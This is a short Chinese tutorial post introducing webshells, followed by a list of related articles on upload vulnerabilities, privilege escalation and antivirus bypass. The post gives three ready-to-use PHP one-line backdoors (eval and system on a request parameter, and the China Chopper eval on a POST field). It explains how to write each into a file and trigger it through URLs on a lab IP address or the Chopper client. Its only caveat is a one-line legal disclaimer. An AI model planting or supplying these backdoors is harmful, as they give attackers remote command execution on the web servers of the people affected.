32、webshell简介

简介: 32、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。


一、eval,使用PHP函数,例如phpinfo()


1、把下面内容写入1.php文件

<?php eval($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=phpinfo();

0a2653c851af460fa595bd959398a8f1.png

二、system,使用系统命令,例如:dir(win),ls(linux)


1、把下面内容写入1.php文件

<?php system($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=dir;

0eacb84100b54626af849e6b562bf92a.png

三、菜刀一句话


1、把下面内容写入1.php文件

<?php @eval($_POST['abc']);?>

2、在菜刀添加该文件路径,点击添加

2d65d23f6d4748949b924e4057485923.png

3、双击网址进入

4cebaac233b3433da32a72337a77fc60.png

6de278e6d6694ce5bb08e7e842b7e74b.png

禁止非法,后果自负

目录
相关文章
|
28天前
|
开发框架 安全 JavaScript
文件上传漏洞(五)一句话合集
文件上传漏洞(五)一句话合集
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
318 0
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
393 1
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
588 0
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
198 0
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
113 0
32、webshell简介
|
开发框架 安全 Java
某教程学习笔记(一):13、脚本木马原理
某教程学习笔记(一):13、脚本木马原理
107 0
某教程学习笔记(一):13、脚本木马原理
|
开发框架 安全 JavaScript
某教程学习笔记(一):14、上传漏洞讲解
某教程学习笔记(一):14、上传漏洞讲解
101 0
某教程学习笔记(一):14、上传漏洞讲解
|
存储 JavaScript 安全
pikachu 靶场之XSS(跨站脚本) -上篇(一)
pikachu 靶场之XSS(跨站脚本) -上篇
203 0
pikachu 靶场之XSS(跨站脚本) -上篇(一)
|
安全 JavaScript 前端开发
pikachu 靶场之XSS(跨站脚本) -上篇(二)
pikachu 靶场之XSS(跨站脚本) -上篇
306 0
pikachu 靶场之XSS(跨站脚本) -上篇(二)